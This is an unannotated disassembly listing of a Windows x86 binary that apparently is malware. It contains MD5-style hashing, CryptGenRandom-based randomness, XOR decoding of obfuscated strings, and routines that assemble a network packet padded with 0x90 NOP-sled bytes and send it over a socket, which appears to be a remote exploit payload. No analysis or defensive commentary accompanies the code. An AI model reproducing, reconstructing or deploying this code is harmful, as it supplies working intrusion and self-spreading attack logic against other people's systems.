mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
loc_41005C: ; DATA XREF: .data:off_41A8CC�o
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: sub_4167F1+DF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call dword_417024 ; CryptAcquireContextA
push offset dword_41EAAC
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAB0
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAB4
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAB8
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd dword_41EAAC, eax
add eax, ebx
lock xadd dword_41EAB0, eax
add eax, ecx
lock xadd dword_41EAB4, eax
add eax, edx
lock xadd dword_41EAB8, eax
add eax, esi
lock xadd dword_41EAAC, eax
add eax, edi
lock xadd dword_41EAB0, eax
add eax, ebp
lock xadd dword_41EAB4, eax
add eax, esp
lock xadd dword_41EAB8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41EAAC, eax
lock xadd dword_41EAB0, eax
lock xadd dword_41EAB4, eax
lock xadd dword_41EAB8, eax
add ecx, ebx
ror ebx, cl
lock xadd dword_41EAB4, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_41EAB0, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41EAAC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_41EAB8, edx
lock xadd dword_41EAB4, ecx
lock xadd dword_41EAB0, ebx
lock xadd dword_41EAAC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAB8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAB8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAB4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAB0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAAC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: sub_4167F1+F0�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAC0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EAC0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: .data:off_41CCD6�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
push offset off_41A8CC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B52 proc near ; DATA XREF: .data:0041CD10�o
var_104C = byte ptr -104Ch
var_FC6 = byte ptr -0FC6h
var_BDE = byte ptr -0BDEh
var_B9E = byte ptr -0B9Eh
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_AF2 = byte ptr -0AF2h
var_88E = byte ptr -88Eh
var_882 = byte ptr -882h
var_85E = byte ptr -85Eh
var_852 = byte ptr -852h
var_82E = byte ptr -82Eh
var_80C = byte ptr -80Ch
var_7CC = byte ptr -7CCh
var_7C8 = byte ptr -7C8h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_204]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_410B52+56�j
push 89h
push offset dword_41AF50
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_410B52+96�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
